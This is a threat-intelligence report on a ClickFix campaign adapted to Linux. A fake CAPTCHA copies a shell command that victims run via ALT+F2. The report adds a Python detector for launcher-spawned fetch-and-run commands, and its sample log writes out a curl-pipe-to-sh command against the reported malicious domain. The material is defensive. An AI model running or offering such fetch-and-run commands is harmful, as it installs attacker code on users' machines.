Full Report
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible. [...]
Analysis Summary
# Tool/Technique: ClickFix Attack Flow Adaptation for Linux
## Overview
ClickFix is an attack methodology that leverages deceptive user interaction, typically a browser-based prompt such as a fake CAPTCHA or error dialog, to trick victims into copying a malicious command to the clipboard and executing it themselves on their local system. Recent observations indicate that threat actors are testing an adaptation of this attack specifically targeting Linux users, following earlier deployments against Windows.
## Technical Details
- Type: Technique / Attack Flow
- Platform: Linux (current target), Windows (previously documented target)
- Capabilities: Bypasses initial security controls by relying on user deception rather than an exploit; the victim executes the attacker-supplied command via a system launcher (e.g., the ALT+F2 run dialog on Linux desktops), so no file needs to be delivered before the first command runs.
- First Seen: Ongoing testing observed against Linux targets.
## MITRE ATT&CK Mapping
- T1204 - User Execution
- T1204.001 - Malicious Link (the victim follows the link to the CAPTCHA page and clicks its button)
- T1204.002 - Malicious File (applicable once the pasted command fetches and runs a script such as `mapeal.sh`)
- T1059.004 - Command and Scripting Interpreter: Unix Shell (the copied command and the dropped payload are shell commands/scripts)
## Functionality
### Core Capabilities
The attack flow relies on the following steps for Linux targets:
1. **OS Detection:** Determining the victim's operating system so that an OS-appropriate command is served.
2. **Redirection:** Presenting a fake CAPTCHA page.
3. **Deception:** Clicking the "I'm not a robot" button silently copies a shell command to the clipboard, while the page instructs the user that a "verification" step follows.
4. **Execution:** Guiding the user to open the Linux run dialog (ALT+F2), paste the command, and execute it.
### Advanced Features
The current Linux payload (`mapeal.sh`) appears benign, fetching only a JPEG image. This suggests the operators (implied to be APT36; see Associated Threat Actors below) are in an experimental phase, testing the viability of the Linux command execution chain before deploying actual malware. The primary mechanism is the successful execution of arbitrary commands dictated by the attacker via the browser/webpage interface; the same chain can deliver any payload once the operators decide to swap the script.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: `mapeal.sh` (Dropped payload)
- Registry Keys: Not applicable (Linux target)
- Network Indicators: `trade4wealth[.]in` (domain hosting the payload and the fetched image)
- Behavioral Indicators: Execution of a user-copied command via the ALT+F2 dialog after interacting with a CAPTCHA page; fetching of a JPEG file initiated by a shell command.
## Associated Threat Actors
- APT36 (implied: the context links this ClickFix evolution to the group, but the snippet does not explicitly state that APT36 is running the current Linux experiments).
## Detection Methods
- Signature-based detection: [Not detailed for the current Linux payload]
- Behavioral detection: Monitoring for shell, `curl` or `wget` processes launched from the ALT+F2 run dialog, especially shortly after web interaction. A command run from the dialog is spawned by the desktop shell (e.g., `gnome-shell` on GNOME, `krunner` on KDE) rather than by a terminal emulator, so process-lineage telemetry (auditd `execve` records joined to a pid/parent table, eBPF exec tracing, osquery, or an EDR) can separate it from ordinary terminal use; a download piped straight into `sh` from that lineage is a strong signal.
- YARA rules: [Not provided in the context]
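The lineage check described above, as an added example that is not code from the original report. It assumes a process-creation feed (eBPF exec tracing, osquery, auditd `execve` records joined to a pid-to-comm table, or an EDR) flattened to one JSON object per line with the keys `pid`, `ppid`, `comm` and `cmdline`; that format, the pids, the URL path and all sample events are constructed for the example. Only the domain `trade4wealth[.]in` and the file name `mapeal.sh` come from the report. The detector walks each new process's ancestors: if it reaches a desktop shell before reaching a terminal emulator, the command came from a launcher such as the ALT+F2 dialog, and a fetch-and-run pattern or a known IOC domain in the command line then raises an alert.

```python
"""Flag fetch-and-run commands launched from a desktop run dialog (ALT+F2).

Added example, not code from the original report. Event format, pids and the
sample events are constructed; only trade4wealth[.]in and mapeal.sh come from
the report.
"""
from __future__ import annotations

import json
import re

# Desktop-shell processes that own the ALT+F2 run dialog (GNOME Shell, KDE's
# KRunner/Plasma). Extend for other desktops.
DESKTOP_SHELLS = {"gnome-shell", "krunner", "plasmashell"}

# Terminal emulators and remote shells: a command typed into a terminal is
# ordinary user activity, so the walk up the process tree stops here silently.
TERMINALS = {"gnome-terminal-", "konsole", "xterm", "alacritty", "kitty",
             "xfce4-terminal", "tmux: server", "sshd"}

FETCH_AND_RUN = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|z|da)?sh\b"   # curl ... | sh
    r"|\b(?:ba|z|da)?sh\b\s+-c\s+.*https?://",          # sh -c "... http..."
    re.IGNORECASE,
)

# Written defanged, as in the report; refang() makes either spelling match.
IOC_DOMAINS = {"trade4wealth[.]in"}


def refang(text: str) -> str:
    """Turn defanged indicators back into the form seen in real telemetry."""
    return text.replace("[.]", ".").replace("hxxp", "http")


class RunDialogDetector:
    """Keeps a pid -> (ppid, comm) table so each event's ancestry is resolvable."""

    def __init__(self) -> None:
        self.procs = {}  # pid -> (ppid, comm)

    def launcher(self, ppid: int) -> str | None:
        """Walk ancestors; return the desktop shell reached before any terminal."""
        seen = set()
        while ppid in self.procs and ppid not in seen:
            seen.add(ppid)
            parent_ppid, comm = self.procs[ppid]
            if comm in TERMINALS:
                return None
            if comm in DESKTOP_SHELLS:
                return comm
            ppid = parent_ppid
        return None

    def ingest(self, event: dict) -> dict | None:
        pid, ppid = int(event["pid"]), int(event["ppid"])
        comm, cmdline = event["comm"], event["cmdline"]
        self.procs[pid] = (ppid, comm)
        shell = self.launcher(ppid)
        if shell is None:
            return None
        reasons = []
        if FETCH_AND_RUN.search(cmdline):
            reasons.append("fetch-and-run command")
        hits = [d for d in IOC_DOMAINS if refang(d) in refang(cmdline)]
        reasons.extend(f"known IOC domain {d}" for d in hits)
        if not reasons:
            return None  # e.g. an application started from the app grid
        return {"pid": pid, "launcher": shell, "cmdline": cmdline,
                "reasons": reasons}


def scan(log: str) -> list[dict]:
    """Run the detector over newline-delimited JSON events; return the alerts."""
    det = RunDialogDetector()
    alerts = []
    for line in log.strip().splitlines():
        alert = det.ingest(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample feed. Event 1320 is the same fetch-and-run shape typed into
# a terminal (no alert); 1500/1510 model the ClickFix chain launched via ALT+F2.
SAMPLE_LOG = r"""
{"pid": 1200, "ppid": 1, "comm": "gnome-shell", "cmdline": "/usr/bin/gnome-shell"}
{"pid": 1300, "ppid": 1200, "comm": "gnome-terminal-", "cmdline": "/usr/libexec/gnome-terminal-server"}
{"pid": 1310, "ppid": 1300, "comm": "bash", "cmdline": "bash"}
{"pid": 1320, "ppid": 1310, "comm": "bash", "cmdline": "bash -c \"curl -fsSL https://example.org/install.sh | sh\""}
{"pid": 1400, "ppid": 1200, "comm": "firefox", "cmdline": "/usr/lib/firefox/firefox"}
{"pid": 1500, "ppid": 1200, "comm": "sh", "cmdline": "sh -c \"curl -s https://trade4wealth[.]in/mapeal.sh | sh\""}
{"pid": 1510, "ppid": 1500, "comm": "curl", "cmdline": "curl -s https://trade4wealth[.]in/mapeal.sh"}
{"pid": 1600, "ppid": 1, "comm": "krunner", "cmdline": "/usr/bin/krunner"}
{"pid": 1610, "ppid": 1600, "comm": "kcalc", "cmdline": "/usr/bin/kcalc"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Run stand-alone, the script prints two alerts, both with launcher `gnome-shell`: the `sh -c` wrapper (fetch-and-run pattern plus the IOC domain) and its child `curl` (IOC domain only); the identical download chain typed into a terminal and the applications started from the app grid or KRunner are not reported. In production the process table should be seeded from `/proc` at start-up so parents that predate the feed resolve, and the terminal and shell name sets tuned to the desktops actually deployed.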
## Mitigation Strategies
- Prevention measures: Users must never paste commands into a run dialog or terminal on the instruction of a web page; a legitimate CAPTCHA never requires running a command. The rule is easy to state and worth repeating in awareness material, because the attack depends entirely on this single user action.
- Hardening recommendations: Educate users about social engineering techniques that coerce command-line execution. Restrict user permissions and outbound access where possible to limit what a dropped script can do, and consider disabling or restricting the run dialog on managed desktops where users do not need it.
## Related Tools/Techniques
- ClickFix attack variations targeting Windows (involving MSHTA and .NET loaders).
- General web-based execution techniques that rely on user intervention (e.g., drive-by downloads, malvertising leading to command execution).